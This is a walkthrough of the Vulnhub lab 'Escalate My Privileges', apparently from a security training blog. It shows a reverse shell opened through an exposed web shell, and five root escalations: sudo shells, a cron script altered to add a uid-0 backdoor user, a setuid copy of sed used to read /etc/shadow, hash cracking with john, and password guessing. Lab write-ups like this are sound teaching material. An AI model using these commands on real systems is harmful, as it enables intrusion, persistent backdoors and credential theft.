577, Gold Plaza, Punjab Jewellers, M.G. Road, Opp. Treasure Island Mall

Escalate My Privileges Vulnhub Walkthrough

Here’s another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills. The box is specially designed for learning and sharpening Linux Privilege Escalation skills. There are several ways of playing with privileges. The goal is to First get the User of the Target then Start Playing with Privileges. Again this blog “Escalate My Privileges Vulnhub Walkthrough” is written by Ritik Kumar Jain. So let us get starting.

Methodology :

Network Scanning
  • Netdiscover
  • Nmap
Enumeration
  • Nikto
  • Netcat payload
Privilege Escalation
  • sudo-l
  • crontab
  • setuid
  • password cracking
  • normal guessing

NETWORK SCANNING:

We start with obtaining the IP address of the machine. So I used netdiscover for the scanning. And my IP is: 192.168.2.10

#netdiscover -i vboxnet0
Currently scanning: 192.168.17.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
_____________________________________________________________________________
IP At        MAC Address      Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.2.2  08:00:27:df:0c:9c 1     42 PCS Systemtechnik GmbH
192.168.2.10 08:00:27:50:8c:dd 1     60 PCS Systemtechnik GmbH

We are scanning our local network. And for that, we are using the Nmap ping scan.

nmap -A -sS -p- -O 192.168.2.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-22 01:37 IST
Nmap scan report for 192.168.2.10
Host is up (0.00056s latency).
Not shown: 65526 filtered ports
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
80/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry 
|_/phpbash.php
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Check your Privilege
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
875/tcp   closed unknown
2049/tcp  open   nfs_acl 3 (RPC #100227)
20048/tcp open   mountd  1-3 (RPC #100005)
42955/tcp closed unknown
46666/tcp closed unknown
54302/tcp closed unknown
MAC Address: 08:00:27:50:8C:DD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9

So far so good. We gat a port 80. So let get enumerating it more.

Enumeration

And I open the target IP address our browser. As we see an image file

Escalate My Privileges Vulnhub Walkthrough

So I open the next page /phpbash.php because we see the file in Nmap output robots.txt file. As disallow entry here we see a bash terminal.

So I run the id command and we see an output apache group name.

And now without wasting our time. I create an oneliner bash reverse shell and start our Netcat payload listener port 1505. So that I can get the shell.

bash -i >& /dev/tcp/192.168.2.1/1505 0>&1 

#nc -nlvp 1505
listening on [any] 1505 ...
connect to [192.168.2.1] from (UNKNOWN) [192.168.2.10] 51562
bash: no job control in this shell
bash-4.2$ id 
id 
uid=48(apache) gid=48(apache) groups=48(apache)
bash-4.2$ hostname
hostname
my_privilege
bash-4.2$ uname -a
uname -a
Linux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

We get a shell.

Privilege Escalation

On the further enumerating the user home directory and we can see a user armour. And on armour user home directory we find a credentials.txt file. So I am using the cat command to open the file and we see a message my password is md5 (rootroot1).

bash-4.2$ cd /home
bash-4.2$ ls
armour
bash-4.2$ cd armour
bash-4.2$ ls
Credentials.txt  backup.sh  runme.sh
bash-4.2$ ls -lha
total 24K
drwxrwxrwx  3 armour armour 121 Mar 21 07:59 .
drwxr-xr-x. 3 root   root    19 Apr 11  2018 ..
-rwxrwxrwx  1 armour armour 123 Mar 19 08:19 .bash_history
-rwxrwxrwx  1 armour armour  27 Mar 17 10:34 .bashrc
drwxrwxrwx  3 armour armour  18 Mar 17 10:27 .local
-rwxrwxrwx  1 root   armour 603 Mar 17 10:30 .viminfo
-rw-r--r--  1 armour armour  30 Mar 21 07:59 Credentials.txt
-rwxrwxrwx  1 root   root    17 Mar 17 09:48 backup.sh
-rwxrwxrwx  1 root   root     8 Mar 17 10:55 runme.sh
bash-4.2$ cat Credentials.txt 
my password is
md5(rootroot1) >>> b7bc8489abe360486b4b19dbc242e885
bash-4.2$

So I am changing our user to armour using SU ( Switch User ) command and we successfully changed our user.

bash-4.2$ su armour
su armour
Password: b7bc8489abe360486b4b19dbc242e885

[[email protected]_privilege html]$ id 
id 
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[[email protected]_privilege html]$ hostname
hostname
my_privilege
[[email protected]_privilege html]$

Now there are many ways to get escalated

METHOD 1: SUDO-L

So sudo -l prints the commands which we are allowed to run as SUDO. And if the attacker can’t directly get root access via any other technique. So he might try to compromise any of the users who have SUDO access.

[[email protected]_privilege html]$ sudo -l
Matching Defaults entries for armour on my_privilege:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", env_keep+=LD_PRELOAD,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,/bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish,
        /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc,/usr/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh,
        /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano,/usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk,
        /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red,/usr/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp,
        /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd,/usr/bin/head, /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail,
        /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip,/usr/bin/zipcloak, /usr/bin/zipnote, /usr/bin/zipsplit,
        /usr/bin/funzip, /usr/bin/unzip, /usr/bin/unzipsfx, /usr/bin/zipgrep,/usr/bin/zipinfo, /usr/bin/7za, /usr/bin/socat, /usr/bin/php,
        /usr/bin/git, /usr/bin/rvim, /usr/bin/rvim, /usr/bin/vim,usr/bin/vimdiff, /usr/bin/vimtutor, /usr/bin/vi, /bin/sed,
        /usr/bin/qalc, /usr/bin/e3, /usr/bin/dex, /usr/bin/elinks,/usr/bin/scp, /usr/bin/sftp, /usr/bin/ssh, /usr/bin/gtar, /usr/bin/tar,
        /usr/bin/rpm, /usr/bin/up2date, /usr/bin/yum, /usr/bin/expect,/usr/bin/find, /usr/bin/less, /usr/bin/more, /usr/bin/perl,
        /usr/bin/python, /usr/bin/man, /usr/bin/tclsh, /usr/bin/script,/usr/bin/nmap, /usr/bin/nmap, /usr/bin/aria2c, /usr/sbin/arp,
        /usr/bin/base64, /usr/bin/busybox, /usr/bin/cpan, /usr/bin/cpulimit,/usr/bin/crontab, /usr/bin/date, /usr/bin/diff, /usr/bin/dmesg,
        /usr/sbin/dmsetup, /usr/bin/dnf, /usr/bin/docker,/usr/bin/easy_install, /usr/bin/emacs, /usr/bin/expand,
        /usr/bin/facter, /usr/bin/file, /usr/bin/finger, /usr/bin/flock,/usr/bin/fmt, /usr/bin/fold, /usr/bin/gdb, /usr/bin/gimp,
        /usr/bin/grep, /usr/bin/head, /usr/sbin/iftop, /usr/bin/ionice,/usr/sbin/ip, /usr/bin/irb, /usr/bin/jjs, /usr/bin/journalctl,
        /usr/bin/jq, /usr/sbin/ldconfig, /usr/sbin/logsave, /usr/bin/ltrace,/usr/bin/lua, /usr/bin/mail, /usr/bin/make, /usr/bin/mawk,
        /usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk,/usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od,
        /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip,/usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap,
        /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts,/usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch,
        /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat,/usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace,
        /usr/bin/systemctl, /usr/bin/taskset, /usr/bin/tclsh,/usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp,
        /usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul,/usr/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget,
        /usr/bin/xargs, /usr/bin/xxd, /script/test.sh, /script/test.py,/sbin/httpd, /usr/sbin/setcap, /usr/sbin/getcap, /usr/local/bin/ht,
        /bin/timedatectl, /home/armour/ai, /usr/bin/user_hello

[[email protected]_privilege html]$ sudo /bin/bash
sudo /bin/bash
[[email protected]_privilege html]# id
id
uid=0(root) gid=0(root) groups=0(root)

[[email protected]_privilege html]$ sudo /usr/bin/user_hello 
root
[[email protected]_privilege html]$ vim /usr/bin/user_hello 
[[email protected]_privilege html]$ cat /usr/bin/user_hello 
#!/bin/bash
bash -i
[[email protected]_privilege html]$ sudo /usr/bin/us
user_hello   users        usleep       usx2yloader  
[[email protected]_privilege html]$ sudo /usr/bin/user_hello 
[[email protected]_privilege html]# id 
uid=0(root) gid=0(root) groups=0(root)


METHOD 2: CRONTAB

Corn jobs generally run with root privileges. And if we can successfully tamper any script or binary which are defined in the corn jobs. So then we can easily execute arbitrary code with root privilege.

[[email protected]_privilege tmp]$ cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/home/armour

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
  *  *  *  *  * root backup.sh
  *  *  *  *  * root run.sh
  *  *  *  *  * root /opt/my_script.sh
  *  *  *  *  * root /opt/my_backup.sh
  0  0  1  1  * root /opt/new_year.sh
  *  *  *  *  * root /usr/bin/bash /script/*.sh
  *  *  *  *  * root /usr/bin/tar czf /backup/armour/`date "+\%F-\%H-\%M"`.tar.gz /home/armour/*
[[email protected]_privilege tmp]$ cd 
[[email protected]_privilege ~]$ ls -lh 
total 12K
-rw-r--r-- 1 armour armour 30 Mar 21 07:59 Credentials.txt
-rwxrwxrwx 1 root   root   63 Apr  3 06:57 backup.sh
-rwxrwxrwx 1 root   root    8 Mar 17 10:55 runme.sh
[[email protected]_privilege ~]$ vim backup.sh 
[[email protected]_privilege ~]$ openssl passwd 123       
lp7umJWRYHRcM
[[email protected]_privilege ~]$ vim backup.sh 
[[email protected]_privilege ~]$ cat backup.sh 
#!/bin/bash
/usr/sbin/useradd dasagreeva -u 0 -o -p lp7umJWRYHRcM
[[email protected]_privilege ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
armour:x:1000:1000::/home/armour:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nginx:x:995:990:Nginx web server:/opt/rh/nginx16/root/var/lib/nginx:/sbin/nologin
mysql:x:994:989:MySQL server:/var/lib/mysql:/bin/bash
exim:x:31:31:Exim Daemon:/dev/null:/bin/false
dasagreeva:x:0:1001::/home/dasagreeva:/bin/bash
[[email protected]_privilege ~]$ su dasagreeva
Password: 
[[email protected]_privilege armour]# id
uid=0(root) gid=1001(dasagreeva) groups=1001(dasagreeva)

METHOD 3:Exploiting SUID Executables

SUID which stands for set user ID is a Linux feature that allows users to execute a file with the permissions of a specified user. UID is a feature that, when used properly, actually enhances Linux security. The problem is that administrators may unknowingly introduce dangerous SUID configurations when they install third-party applications or make logical configuration changes.

[[email protected]_privilege html]$ find / -perm -u=s -type f 2>/dev/null 
/var/www/html/awk
/var/www/html/sed
/usr/bin/sed
/usr/bin/curl
/usr/bin/pic
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/rpm
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/bin/python2.7
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/shc
/usr/bin/shtool
/usr/bin/targetcli
/usr/bin/rlwrap
/usr/bin/scponly
/usr/bin/qalc
/usr/bin/irb
/usr/bin/tclsh8.5
/usr/bin/expect
/usr/bin/zipcloak
/usr/bin/zipnote
/usr/bin/zipsplit
/usr/bin/funzip
/usr/bin/unzipsfx
/usr/bin/zipgrep
/usr/bin/zipinfo
/usr/bin/jq
/usr/bin/ltrace
/usr/bin/mailx
/usr/bin/busybox
/usr/bin/mawk
/usr/bin/cpulimit
/usr/bin/puppet
/usr/bin/smbclient
/usr/bin/strace
/usr/bin/user_hello
/usr/bin/fusermount
/usr/sbin/ldconfig
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/arp
/usr/sbin/dmsetup
/usr/sbin/service
/usr/sbin/usernetctl
/usr/sbin/iftop
/usr/sbin/exim-4.84-3
/usr/sbin/mtr
/usr/sbin/ifconfig
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/git-core/git-mktag
/usr/libexec/git-core/git-mktree
/usr/libexec/git-core/git-mv
/usr/libexec/git-core/git-name-rev
/usr/libexec/git-core/git-notes
/usr/libexec/git-core/git-pack-objects
/usr/libexec/git-core/git-pack-redundant
/usr/libexec/git-core/git-pack-refs
/usr/libexec/git-core/git-replace
/usr/libexec/git-core/git-patch-id
/usr/libexec/git-core/git-add
/usr/libexec/git-core/git-annotate
/usr/libexec/git-core/git-apply
/usr/libexec/git-core/git-archive
/usr/libexec/git-core/git-bisect--helper
/usr/libexec/git-core/git-blame
/usr/libexec/git-core/git-branch
/usr/libexec/git-core/git-bundle
/usr/libexec/git-core/git-cat-file
/usr/libexec/git-core/git-check-attr
/usr/libexec/git-core/git-check-ignore
/usr/libexec/git-core/git-check-ref-format
/usr/libexec/git-core/git-checkout
/usr/libexec/git-core/git-checkout-index

[[email protected]_privilege html]$ sudo sh -c 'cp $(which sed) .; chmod +s ./sed'
[[email protected]_privilege html]$ ./sed -e '' "/etc/shadow"
root:$6$lYoxb/H/0LQ5d50Q$mM2ej4Um6zmkg11uszJrBpZo/vI4TT6nEvQnlnI/GlB9otfNIyN9xXfATAxVAUzj4ojTE1pmFbY12NUzw2j/b0:18313:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7:::
adm:*:16372:0:99999:7:::
lp:*:16372:0:99999:7:::
sync:*:16372:0:99999:7:::
shutdown:*:16372:0:99999:7:::
halt:*:16372:0:99999:7:::
mail:*:16372:0:99999:7:::
operator:*:16372:0:99999:7:::
games:*:16372:0:99999:7:::
ftp:*:16372:0:99999:7:::
tcpdump:!!:18319::::::
armour:$6$ibscpEYi$A0bt4lJe4NdD8hqG6KrZs.I7nS6chM1mMP/6LtG/DlMQ30W8aQDSr9uM42jI8bGoEZCWUr87aalTQrkioxxQg/:18340:0:99999:7:::
mysql:!!:18337::::::
exim:!!:18339:0:99999:7:::
dasagreeva:lp7umJWRYHRcM:18355:0:99999:7:::
[[email protected]_privilege html]$ 

We can now see the shadow file of the box.

METHOD 4: Password cracking

We are going to crack the password to the root user form shadow file. For that, we must be needing shadow file and passwd file in text form.

#cd emp/
#ls
passwd.txt  shadow.txt
#unshadow passwd.txt shadow.txt > password.txt
#john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
Warning: only loading hashes of type "sha512crypt", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates left, minimum 8 needed for performance.
rootroot1        (root)
1g 0:00:00:00 DONE (2020-04-22 14:15) 25.00g/s 75.00p/s 150.0c/s 150.0C/s 
Use the "--show" option to display all of the cracked passwords reliably
Session completed

METHOD 5: Guessing

And so the last but not the least password guessing is the one more way to go

bash-4.2$ su root 
su root 
Password: rootroot1
id 
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls 
proof.txt
cat proof.txt
Best of Luck
628435356e49f976bab2c04948d22fe4

 

 

Leave a comment

WhatsApp us